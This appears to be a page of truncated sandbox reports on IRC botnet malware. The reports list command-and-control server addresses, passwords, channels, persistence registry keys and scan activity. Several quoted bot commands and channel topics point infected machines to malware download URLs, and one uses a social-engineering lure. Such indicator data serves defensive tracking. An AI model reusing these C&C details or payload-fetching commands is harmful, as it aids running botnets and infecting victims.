Remote Host Port Number 95.154.216.63 3211 NICK XP5e7Y3 USER Mazyon_1z7 “” “” : 14Don`t 14Abuse 14Power JOIN #g xpass MODE #G PRIVMSG XP5e7Y3 : PING 1264507340 Registry Modifications * The following Registry Keys were created: o HKEY_LOCAL_MACHINESOFTWAREClasses.cha o HKEY_LOCAL_MACHINESOFTWAREClasses.chat o HKEY_LOCAL_MACHINESOFTWAREClassesChatFile o HKEY_LOCAL_MACHINESOFTWAREClassesChatFileDefaultIcon o HKEY_LOCAL_MACHINESOFTWAREClassesChatFileShell o HKEY_LOCAL_MACHINESOFTWAREClassesChatFileShellopen o HKEY_LOCAL_MACHINESOFTWAREClassesChatFileShellopencommand o HKEY_LOCAL_MACHINESOFTWAREClassesChatFileShellopenddeexec o HKEY_LOCAL_MACHINESOFTWAREClassesChatFileShellopenddeexecApplication o HKEY_LOCAL_MACHINESOFTWAREClassesChatFileShellopenddeexecifexecRead more...

Remote Host Port Number 92.243.19.221 16667 NICK [USA]XP-SP2[00]1154 USER qhvb 0 0 : JOIN #l# lam 2k bots inside USERHOST [USA]XP-SP2[00]1154 MODE [USA]XP-SP2[00]1154 -x+i PONG :MBoY.Org Invisible Users: 6556 Channels: 19 channels formed Clients: I have 6557 clients and 0 servers Local users: Current Local Users: 6557 Max: 13429 Global users: Current Global Users: 6557Read more...

193.104.27.98 193.104.27.98 UDP Connections Remote IP Address: 127.0.0.1 Port: 1036 Send Datagram: 9 packet(s) of size 1 Recv Datagram: 9 packet(s) of size 1 Download URLs http://193.104.27.98/2krn.bin (193.104.27.98) Outgoing connection to remote server: 193.104.27.98 TCP port 80 DNS Lookup Host Name IP Address dell-d3e62f7e26 10.1.10.2 10.1.10.1 10.1.10.1 wpad 193.104.27.98 193.104.27.98 193.104.27.107 193.104.27.107 Opened listening TCPRead more...

Remote Host Port Number 93.185.77.230 43000 NICK [00|USA|XP|SP2|6283 USER rpiid 0 0 :[00|USA|XP|SP2|6283 USERHOST [00|USA|XP|SP2|6283 MODE [00|USA|XP|SP2|6283 +i JOIN #@tijn@# PRIVMSG #@tijn@# : 12 ScAnAgE 15 Random Method started at 192.168.x.x :sql-3306 for 0 minutes 5 delay 50 threads PONG :B5B44799 * The following ports were open in the system: Port Protocol Process 69 UDPRead more...

private.beer-rox.net 194.242.6.81 * C&C Server: 194.242.6.81:5822 PASS aaa * Server Password: * Username: XP-0428 * Nickname: [00|DEU|298531] * Channel: #ddos# (Password: open) * Channeltopic: :.msn.msg Estas foto es tuyo? http://www.sexy-brazil.com/mad.exe?= #log# #gt# 15K bots #log# = .pstore Registry Changes by all processes Create or Open Changes HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun “MSN Update” = wms.exe Reads HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTFSystemShared “CUAS” HKEY_CURRENT_USERKeyboardRead more...

Remote Host Port Number 69.42.218.72 1863 MODE [00_USA_XP_3307080] -ix JOIN #dam open PRIVMSG #t :HTTP SET http://rapidshare.com/files/339293902/newb PRIVMSG #dam :scan// Trying to get external IP. PRIVMSG #dam :scan// Random Port Scan started on 192.168.x.x:445 with a delay of 3 seconds for 0 minutes using 35 threads. PRIVMSG #dam :scan// Random Port Scan started on 192.x.x.x:445Read more...

Host Name IP Address sql.mytijn.org 95.86.129.10 * C&C Server: 95.86.129.10:43000 * Server Password: * Username: inlw * Nickname: [00|DEU|XP|SP3|3233 * Channel: #@tijn@# (Password: ) * Channeltopic: :.find sql-3306 40 3 0 -b -r Registry Changes by all processes Create or Open Changes HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun “Internet Explore AutoUpdate” = iexplorer.exe HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunServices “Internet Explore AutoUpdate” = iexplorer.exe HKEY_CURRENT_USERSYSTEMCurrentControlSetControlLsaRead more...

www.dbsclick.com DNS_TYPE_A 205.234.235.26 1 205.234.235.26:2345 Nick: [AUT|00|P|61866] Username: XP-8498 Server Pass: xxx Joined Channel: #imb with Password test Channel Topic for Channel #imb: “D http://haha-ha.com/image.php?=” Private Message to Channel #info: “[10]: Thread Disabled.” Private Message to Channel #info: “[10]: Thread Activated: Sending Message With Email.”

Remote Host Port Number 174.136.55.4 80 202.169.224.12 6667 * The data identified by the following URL was then requested from the remote web server: o http://codienviet.com/bot/notwelcome.php NICK TLG-FVDBXNPG USER TLG-LTZZCCTX 0 0 TLG-LTZZCCTX NICK TLG-YTWZHFAX USER TLG-YTWZHFAX 0 0 TLG-YTWZHFAX USER TLG-FVDBXNPG 0 0 TLG-FVDBXNPG PONG :1444004578 JOIN #dunghoitaisao 150685 MODE TLG-FVDBXNPG +i MODE #dunghoitaisaoRead more...

evilthoughtz.no-ip.org 93.174.88.65 Invisible Users: 258 Operators: 8 operator(s) online Channels: 28 channels formed Clients: I have 255 clients and 0 servers Local users: Current Local Users: 255 Max: 906 Global users: Current Global Users: 366 Max: 1266 * C&C Server: 93.174.88.65:6667 * Server Password: * Username: {Administrator|v3}3311 * Nickname: {Administrator|v3}3311 * Channel: #EvilLordz (Password: )Read more...